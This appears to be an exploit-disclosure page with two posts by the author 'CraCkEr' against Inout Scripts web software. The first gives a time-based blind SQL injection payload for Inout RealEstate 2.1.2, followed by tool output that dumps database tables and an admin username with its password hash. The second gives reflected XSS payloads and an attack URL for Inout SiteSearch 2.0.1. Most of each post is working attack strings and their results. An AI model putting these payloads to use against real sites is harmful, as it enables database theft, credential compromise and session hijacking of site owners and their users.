Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
</code></pre>
<pre><code>C r a C k E r<br />T H E   C R A C K   O F   E T E R N A L   M I G H T<br /><br />From The Ashes and Dust Rises An Unimaginable crack....<br /><br />[ Exploits ]<br /><br />Author   : CraCkEr<br />Website  : inoutscripts.com<br />Vendor   : Inout Scripts<br />Software : Inout RealEstate 2.1.2<br />Vuln Type: Remote SQL Injection<br />Method   : GET<br />Impact   : Database Access<br /><br />Inout RealEstate is an easy, flexible and simple property management solution ideal for business start-ups.<br /><br />B4nks-NET irc.b4nks.tk #unix<br /><br />Release Notes:<br />Typically used for remotely exploitable vulnerabilities that can lead to system compromise.<br /><br />Greets:<br /><br />The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL<br />Phr33k, NK, GoldenX, Wehla, Cap, DarkCatSpace, R0ot, KnG, Centerk, chamanwal<br />loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear, H3LLB0Y, ix7<br /><br />CryptoJob (Twitter) twitter.com/CryptozJob<br /><br />© CraCkEr 2022<br /><br /><br />POST parameter 'lidaray' is vulnerable.<br /><br />---<br />Parameter: lidaray (POST)<br />    Type: time-based blind<br />    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br />    Payload: lidaray=20MKTTVT24' AND (SELECT 1823 FROM (SELECT(SLEEP(5)))Caim) AND 'bHOb'='bHOb<br />---<br /><br />[INFO] the back-end DBMS is MySQL<br /><br />[INFO] fetching current database<br />current database: 'inout_realestate'<br /><br /><br />fetching tables for database: 'inout_realestate'<br /><br />Database: inout_realestate<br />[45 tables]<br />+--------------------------------+<br />| adcode                         |<br />| admin_account                  |<br />| admin_payment_details          |<br />| agent_list_request_to_user     |<br />| broker_citymap                 |<br />| broker_rate                    |<br />| broker_review                  |<br />| brokerabusereport              |<br />| category_property              |<br />| chat_details                   |<br />| chat_messages                  |<br />| checkout_ipn                   |<br />| countries                      |<br />| custom_field                   |<br />| detail_statistics_list         |<br />| email_templates                |<br />| enquiry_status                 |<br />| forgetpassword                 |<br />| inout_ipns                     |<br />| invoicegen                     |<br />| languages                      |<br />| list_brokermap                 |<br />| list_images                    |<br />| list_main                      |<br />| listopenhouse                  |<br />| normal_statistics_list         |<br />| paymentdetailstat              |<br />| ppc_currency                   |<br />| public_side_media_detail       |<br />| public_slide_images            |<br />| pupularsiarchlist              |<br />| recentsearchlist               |<br />| settings                       |<br />| sold_listing                   |<br />| soldlistadd                    |<br />| traveller_bank_deposit_history |<br />| user_broker_licenses           |<br />| user_broker_registration       |<br />| user_email_verification        |<br />| user_list_agent_request        |<br />| user_registration              |<br />| user_wishlist_mapping          |<br />| userabusereport                |<br />| userlistactive                 |<br />| wish_list                      |<br />+--------------------------------+<br /><br /><br />[INFO] fetching columns for table 'admin_account' in database 'inout_realestate'<br /><br />Database: inout_realestate<br />Table: admin_account<br />[6 columns]<br />+------------+--------------+<br />| Column     | Type         |<br />+------------+--------------+<br />| admin_type | tinyint(4)   |<br />| id         | int(11)      |<br />| logouttime | int(11)      |<br />| password   | varchar(255) |<br />| status     | tinyint(4)   |<br />| username   | varchar(200) |<br />+------------+--------------+<br /><br /><br />[INFO] fetching entries of column(s) 'admin_type,id,password,username' for table 'admin_account' in database 'inout_realestate'<br /><br />Database: inout_realestate<br />Table: admin_account<br />[1 entry]<br />+----+----------+------------------------------------------+------------+<br />| id | username | password                                 | admin_type |<br />+----+----------+------------------------------------------+------------+<br />| 1  | admin    | 21232f297a57a5a743894a0e4a801fc3 (admin) | 0          |<br />+----+----------+------------------------------------------+------------+<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>C r a C k E r<br />T H E   C R A C K   O F   E T E R N A L   M I G H T<br /><br />From The Ashes and Dust Rises An Unimaginable crack....<br /><br />[ Exploits ]<br /><br />Author   : CraCkEr<br />Website  : inoutscripts.com<br />Vendor   : Inout Scripts<br />Software : Inout SiteSearch 2.0.1<br />Vuln Type: Cross Site Scripting Reflected<br />Method   : GET<br />Impact   : Manipulate the content of the site<br /><br />Inout SiteSearch is a premium script that allows you to add a site search feature.<br /><br />B4nks-NET irc.b4nks.tk #unix<br /><br />Release Notes:<br />An attacker can send the victim a link containing a malicious URL in an email or instant message and perform a wide variety of actions, such as stealing the victim's session token or login credentials.<br /><br />Greets:<br /><br />The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL<br />Phr33k, NK, GoldenX, Wehla, Cap, DarkCatSpace, R0ot, KnG, Centerk, chamanwal<br />loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear, H3LLB0Y, ix7<br /><br />CryptoJob (Twitter) twitter.com/CryptozJob<br /><br />© CraCkEr 2022<br /><br /><br />GET parameter 'searchkeyword' is vulnerable to XSS<br /><br />http://inout-sitesearch.demo.inoutscripts.net/index.php/search/result?searchkeyword=[XSS]<br /><br /><br />Some XSS Payloads Reflected<br /><br />javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'><br /><br /><IMG """><SCRIPT>alert("XSS")</SCRIPT>"\><br /><br /></TITLE><SCRIPT>alert("XSS");</SCRIPT><br /><br /><br /><br />[-] Done<br /></code></pre>